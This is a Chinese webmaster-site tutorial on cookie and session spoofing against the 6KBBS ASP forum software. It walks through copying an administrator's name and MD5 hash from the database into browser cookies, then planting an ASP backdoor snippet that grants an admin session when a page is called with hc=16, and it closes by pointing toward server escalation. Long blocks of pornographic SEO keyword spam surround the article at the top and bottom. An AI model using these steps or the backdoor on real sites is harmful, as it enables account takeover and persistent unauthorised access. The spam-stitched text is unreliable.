亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長(zhǎng)網(wǎng)

17站長(zhǎng)網(wǎng) 首頁 安全 安全教程 查看內(nèi)容

實(shí)例講解Cookies欺騙與session欺騙入侵

2022-9-24 10:14| 查看: 2876 |來源: 互聯(lián)網(wǎng)

我們先來說下基礎(chǔ)知識(shí),免的一些菜鳥看不懂,有借鑒. cookies欺騙,就是在只對(duì)用戶做cookies驗(yàn)證的系統(tǒng)中,通過修改cookies的內(nèi)容來得到相應(yīng)的用戶權(quán)限登錄。   那么什么是cookies呢,我這里給大家
我們先來說下基礎(chǔ)知識(shí),免的一些菜鳥看不懂,有借鑒. cookies欺騙,就是在只對(duì)用戶做cookies驗(yàn)證的系統(tǒng)中,通過修改cookies的內(nèi)容來得到相應(yīng)的用戶權(quán)限登錄。

  那么什么是cookies呢,我這里給大家一個(gè)專業(yè)的解釋,cookies是一個(gè)儲(chǔ)存于瀏覽器目錄中的文本文件,記錄你訪問一個(gè)特定站點(diǎn)的信息,且只能被創(chuàng)建這個(gè)cookies的站點(diǎn)讀回,約由255個(gè)字符組成,僅占4kb硬盤空間。當(dāng)用戶正在瀏覽某站點(diǎn)時(shí),它儲(chǔ)存于用戶機(jī)的隨機(jī)存取存儲(chǔ)器ram中,退出瀏覽器后,它儲(chǔ)存于用戶的硬盤中。儲(chǔ)存在cookies中的大部分信息是普通的,如當(dāng)你瀏覽一個(gè)站點(diǎn)時(shí),此文件記錄了每一次的擊鍵信息和被訪站點(diǎn)的地址等。但是許多web站點(diǎn)使用cookies來儲(chǔ)存針對(duì)私人的數(shù)據(jù),如:注冊(cè)口令、用戶名、信用卡編號(hào)等。

什么是Session?當(dāng)一個(gè)訪問者來到你的網(wǎng)站的時(shí)候一個(gè)Session就開始了,當(dāng)他離開的時(shí)候Session就結(jié)束了。本質(zhì)是來說,cookie是和瀏覽器有關(guān)系,而Session變量就可以存一些資源變量在服務(wù)器上面。
正題: 我們先里看個(gè)實(shí)例,在6KBBS的login.asp找到113—124行,得到以下代碼:

if
[url=javascript:][color=#949494]Copy code[/color][/url]
login=false then tl=" 登 陸 失 敗" mes=mes&"

  ·返回重新填寫" else response.cookies(prefix)("lgname")

  =lgname session(prefix"lgname")=

  lgname response.cookies(prefix)("lgpwd")=

  lgpwd response.cookies(prefix)("lgtype")=

  lgtype response.cookies(prefix)("lgcook")=

  cook if cook>0 then response.cookies(prefix).expires=

  date cook end if

我們來分析下,如果你登錄失敗了他就顯示你登錄失敗并引導(dǎo)你返回上一頁,否則就給你寫進(jìn)cookies里面,如果你的cookies有的話那么你的過期時(shí)間就是你cookies的過期時(shí)間——也就是你保存cookies的時(shí)間了。 這時(shí),我們想到的是如果里面的信息是admin的,那一不就成了以管理員登陸了嗎? 首先,我們先去注冊(cè)一個(gè)用戶,然后登錄,有個(gè)cookies保存的選項(xiàng),一定要選哦。我選擇是保存一個(gè)月,因?yàn)楸4媪瞬艜?huì)再你本機(jī)上寫進(jìn)它的cookies。接著,打開數(shù)據(jù)庫,看admin表里面有什么東西,別的不管,你只要那個(gè)bd為16的那個(gè)人就行了。有可能沒有,你可以到他們論壇去逛一下,看管理員是誰,然后在數(shù)據(jù)庫里面拿他的賬號(hào)和加密的密碼來欺騙。

  打開iecookiesview,這款軟件是拿來察看和修改本機(jī)的cookies的,很方便我們的cookies欺騙入侵。

  在iecookiesview 里找到你要欺騙的那個(gè)網(wǎng)站,看到了嗎?有你的用戶名和md5加密的密碼,我們吧這兩項(xiàng)改為管理員的,就是把剛才數(shù)據(jù)庫里面的管理員賬號(hào)和md5加密的密碼代替你自己的。點(diǎn)擊“更改cookies”,打開一個(gè)新的ie,然后再去訪問那個(gè)論壇,看到?jīng)]有?你現(xiàn)在已經(jīng)是管理員了。

接著,麻煩的事出現(xiàn)了,后臺(tái)登陸并不是以cookies來實(shí)現(xiàn)的,而是以session實(shí)現(xiàn)的 ,所以我們同樣來欺騙session;

首先簡(jiǎn)單說一下一般asp系統(tǒng)的身份驗(yàn)證原理。 一般來說,后臺(tái)管理員在登錄頁面輸入賬號(hào)密碼后,程序會(huì)拿著他提交的用戶名密碼去數(shù)據(jù)庫的管理員表里面找,如果有這個(gè)人的賬號(hào)密碼就認(rèn)為你是管理員,然后給你一個(gè)表示你身份的session值。或者程序先把你的用戶名密碼提取出來,然后到數(shù)據(jù)庫的管理員表里面取出管理員的賬號(hào)密碼來和你提交的相比較,如果相等,就跟上面一樣給你個(gè)表示你身份的sesion值。然后你進(jìn)入任何一個(gè)管理頁面它都要首先驗(yàn)證你的session值,如果是管理員就讓你通過,不是的話就引導(dǎo)你回到登錄頁面。

找到manage/admin.asp,發(fā)現(xiàn)驗(yàn)證內(nèi)容為:

[url=javascript:][color=#949494]Copy code[/color][/url]
...
  else
   rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")
   rs("LastLoginTime")=now()
   rs("LoginTimes")=rs("LoginTimes") 1
   rs.update
   session.Timeout=SessionTimeout
   session("AdminName")=rs("username")
   rs.close
   set rs=nothing
   call CloseConn()
   Response.Redirect "Admin_Index.asp" 很容易就知道如果沒有獲得驗(yàn)證就會(huì)出現(xiàn)兩個(gè)session值:
[url=javascript:][color=#949494]Copy code[/color][/url]
session.Timeout=SessionTimeout
  session("AdminName")=rs("username") 試想如果我們以adminName的信息登陸就就ok了..接著用ASP木馬編輯器來添加代碼如下:

[url=javascript:][color=#949494]Copy code[/color][/url]
dim id
  id=trim(request("hc"))
  if id="16" then
   session("AdminName")="admin"
  end if 分析上段代碼,有個(gè)不定值--admin,可以根據(jù)實(shí)際情況來設(shè)置,不一定是admin;可以在一些不常去的頁面來登陸,如:FriendSite.asp?hc=16返回時(shí)頁面沒有出現(xiàn)異樣,這就行了,然后再次登陸manage/admin.asp,你會(huì)發(fā)現(xiàn),你已經(jīng)進(jìn)入后臺(tái)了。然后可以提權(quán)得弄服務(wù)器了。
本文最后更新于 2022-9-24 10:14,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請(qǐng)?jiān)诰W(wǎng)站留言或聯(lián)系站長(zhǎng):17tui@17tui.com
·END·
站長(zhǎng)網(wǎng)微信號(hào):w17tui,關(guān)注站長(zhǎng)、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營(yíng)銷服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!

17站長(zhǎng)網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長(zhǎng)轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷服務(wù),與站長(zhǎng)一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長(zhǎng)網(wǎng)微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        久久综合狠狠综合久久激情 | 午夜久久电影网| 久久一日本道色综合| 亚洲日本免费电影| 欧美一区二区日韩| 国产色产综合色产在线视频| 亚洲女同一区二区| 国产精品伊人色| 色综合久久久久网| 国产精品素人一区二区| 蜜桃一区二区三区在线| 日本乱码高清不卡字幕| 免费成人在线播放| 美女视频免费一区| 成人高清视频免费观看| 欧美日韩视频在线第一区 | 国模一区二区三区白浆 | 国内不卡的二区三区中文字幕 | 天堂在线亚洲视频| 国产精品一区在线观看你懂的| 不卡的av电影| 欧美激情在线观看视频免费| 亚洲一区二区三区四区的| 麻豆一区二区在线| 欧美日韩一区久久| 亚洲欧美日韩系列| voyeur盗摄精品| 狠狠久久亚洲欧美| 亚洲大尺度视频在线观看| 日本亚洲天堂网| 国产一区二区福利视频| 国产人久久人人人人爽| 欧美性高清videossexo| 欧美性生活久久| 一区二区三区四区高清精品免费观看| 精品国产不卡一区二区三区| 中文字幕精品在线不卡| 懂色av一区二区在线播放| 欧美一区二区网站| 蜜桃精品视频在线观看| 高清免费成人av| 亚洲免费大片在线观看| 欧美精品日韩综合在线| 成人免费在线视频| 欧美亚男人的天堂| 国产一区在线看| 久久综合999| 91福利社在线观看| 国产一区二区三区视频在线播放| 久久精品视频网| 欧美日韩一二三区| 成人av资源网站| 久久久精品黄色| 国产一区二区在线看| 亚洲午夜免费福利视频| 国产欧美日韩久久| 欧美v日韩v国产v| 欧美精选在线播放| a在线欧美一区| caoporn国产精品| 欧美日韩色综合| 视频一区二区欧美| 国产精品免费人成网站| 色94色欧美sute亚洲线路一久| 亚洲午夜一区二区| 日韩欧美卡一卡二| 久久99久国产精品黄毛片色诱| 国产成人av电影在线| 精品一区二区三区免费播放| 麻豆91在线播放| 国产精品乱码一区二区三区软件 | a在线欧美一区| 亚洲免费观看视频| 91精品综合久久久久久| 欧美日本国产一区| 91在线视频18| 成人精品亚洲人成在线| 日日嗨av一区二区三区四区| 久久天天做天天爱综合色| 国产精品美女久久久久高潮| 亚洲乱码日产精品bd| 国内精品伊人久久久久影院对白| 国内精品伊人久久久久av一坑| 亚洲午夜久久久久久久久久久| 日韩 欧美一区二区三区| 国产传媒一区在线| 激情综合色综合久久| 色综合天天性综合| 日韩欧美一二三| 久久久久久久av麻豆果冻| 亚洲二区在线观看| 一本到一区二区三区| 中文字幕国产一区| 视频一区二区三区在线| 欧美色老头old∨ideo| 欧美日韩国产三级| 精品久久免费看| 激情小说亚洲一区| 国产精品青草综合久久久久99| 日韩欧美国产午夜精品| 日本人妖一区二区| 国产精品77777| 亚洲国产精品久久人人爱蜜臀| 极品少妇xxxx精品少妇| 久久综合精品国产一区二区三区| 成人免费视频视频| 精品一区二区三区影院在线午夜| 亚洲欧美一区二区三区国产精品| 日韩欧美一级二级三级| 欧洲av在线精品| 亚洲成a人片综合在线| 久久综合狠狠综合久久激情| 天天综合网 天天综合色| 国产精品国产三级国产专播品爱网| 亚洲视频香蕉人妖| 国产精品99久久久久久久vr| 欧美白人最猛性xxxxx69交| 亚洲欧洲精品天堂一级| 国产精品123区| 日韩精品一区二区三区swag | 亚洲美女免费在线| 喷水一区二区三区| 日韩三级.com| 国产一区二区伦理| 欧美大片日本大片免费观看| 亚洲色图19p| 日本精品视频一区二区三区| 亚洲日本欧美天堂| 欧美中文字幕久久| 亚洲美腿欧美偷拍| 在线亚洲一区观看| 亚洲人成精品久久久久久| 在线观看视频91| 欧美三电影在线| 日韩伦理电影网| 亚洲欧美日韩中文播放| 中文在线一区二区 | 国产成人免费网站| 成人性生交大片免费看在线播放| 欧美午夜电影网| 国产真实乱偷精品视频免| 亚洲第一在线综合网站| 国产一区二区三区免费观看| 欧美电视剧免费全集观看| 2022国产精品视频| 欧美亚洲另类激情小说| 欧美亚洲综合网| 国产精品系列在线| 欧美精品一区二区三区很污很色的 | 3atv一区二区三区| 蜜乳av一区二区| 中文字幕视频一区| 精品粉嫩aⅴ一区二区三区四区| 激情六月婷婷久久| 午夜成人免费视频| 国产精品国产三级国产三级人妇| 欧美色网站导航| 91一区二区三区在线播放| 久久电影网站中文字幕| 蜜桃视频一区二区| 亚洲成人免费电影| 亚洲综合一二区| 亚洲欧美在线另类| 久久久久久久久久久久久女国产乱| 欧美性大战久久久久久久蜜臀 | 国产中文字幕精品| 亚洲va韩国va欧美va| 亚洲免费看黄网站| 亚洲综合清纯丝袜自拍| 欧美亚洲国产一区二区三区va| 激情综合色播激情啊| 成人性生交大片免费看中文网站| 欧美久久久久久久久| 中文字幕一区不卡| 久久精品人人做人人爽97| 成人午夜免费电影| 成人a级免费电影| 欧美亚洲国产怡红院影院| 一区二区三区免费看视频| 一个色在线综合| 天天综合网 天天综合色| 国产一区二区三区| 国产欧美精品一区二区色综合朱莉| 国产在线精品一区在线观看麻豆| 国产三级精品视频| 在线观看亚洲精品| 美女免费视频一区| 国产精品水嫩水嫩| 欧美女孩性生活视频| 国产美女主播视频一区| 亚洲激情欧美激情| 日韩一区二区电影| 视频在线观看一区二区三区| 99re在线精品| 精品国产伦一区二区三区观看方式 | 久久久精品一品道一区| 欧美经典三级视频一区二区三区| 亚洲国产aⅴ天堂久久| 欧美精品一二三| 天天做天天摸天天爽国产一区|